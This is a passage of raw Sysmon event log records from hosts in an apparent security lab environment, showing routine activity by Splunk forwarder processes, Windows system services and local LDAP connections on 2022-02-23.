indows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284971Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:02.635{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284970Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:02.635{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-0E12-6216-9F04-000000003802}4144C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000284969Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:02.635{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0E12-6216-9F04-000000003802}4144C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000284968Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:02.636{C8EA50B7-0E12-6216-9F04-000000003802}4144C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000284967Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:02.431{C8EA50B7-0E12-6216-9E04-000000003802}36046028C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284966Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:02.135{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0E12-6216-9E04-000000003802}3604C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284965Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:02.135{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284964Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:02.135{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284963Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:02.135{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284962Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:02.135{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-0E12-6216-9E04-000000003802}3604C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000284961Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:02.135{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284960Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:02.135{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0E12-6216-9E04-000000003802}3604C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000284959Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:02.135{C8EA50B7-0E12-6216-9E04-000000003802}3604C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000284979Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:03.900{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E90457DBA9A433A9A610778C1B57BE5F,SHA256=CDBE4BD8F0FACD303A0FEA6F84AD63983D9D12A371E98FA734C90D42F68EBDE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284978Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:03.135{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=37741C82D3DB099224988A969CB51E47,SHA256=40DAF4CBA507C3911E541C1A9C6F07234E83DA3B124F549188E7069AC880C39E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284977Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:03.135{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6BCBBF1F78B567E843E34C5B2B903D1A,SHA256=B1053AA44FEFC84609BE053A9C4C77A583F20F0EA670A70775AC6AFDC213D26A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214111Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:03.044{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A82777DEB45522134FEFBCEFAFC2A00,SHA256=62C9354D0E7819BA647961E1A65C1244ED603BB3A4DDF2DD44A0DD3579E6E864,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214114Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:02.403{4F8D34B0-F11C-6215-1100-000000003902}980C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruetruefe80:0:0:0:20b3:19bc:f5ff:fef0win-host-tcontreras-attack-range-985546dhcpv6-clienttrueff02:0:0:0:0:0:1:2-547dhcpv6-server 354300x8000000000000000214113Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:01.592{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51166-false10.0.1.12-8000- 23542300x8000000000000000214112Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:04.138{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56BAF5FDA1B91EE515033721CFEC218A,SHA256=E74F92854F57C0B2D6C164254C9845963A1E46A51EB7130A3521BDF8AD0E3E1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284988Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:04.681{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=37741C82D3DB099224988A969CB51E47,SHA256=40DAF4CBA507C3911E541C1A9C6F07234E83DA3B124F549188E7069AC880C39E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000284987Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:04.260{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0E14-6216-A004-000000003802}6084C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284986Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:04.260{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284985Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:04.260{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284984Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:04.260{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284983Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:04.260{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284982Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:04.260{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-0E14-6216-A004-000000003802}6084C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000284981Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:04.260{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0E14-6216-A004-000000003802}6084C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000284980Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:04.260{C8EA50B7-0E14-6216-A004-000000003802}6084C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000214115Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:05.153{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=918ECD688290A8F872BD99ECC8C8DE79,SHA256=EF38D516FF0109A6BF1E9DA169238F8BF058DD461328A97ADBCDED1D795A0C1E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000284991Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:03.081{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53218-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000284990Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:03.081{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53218-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000284989Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:05.041{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9714D7BE21687A0BA4370182E19646E2,SHA256=BA8BC01379914A67CD69B3A1CDCB7F3434EBB1FEBB13C4F0A443543C7D6730E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214116Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:06.184{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=733FF75AF602151598A2E5778C80C010,SHA256=3CAC4FCE6FED8AFCF7DE79610CCD8BE8CAC819FCAD3B5950795EE730A0764CC2,IMPHASH=00000000000000000000000000000000falsetrue 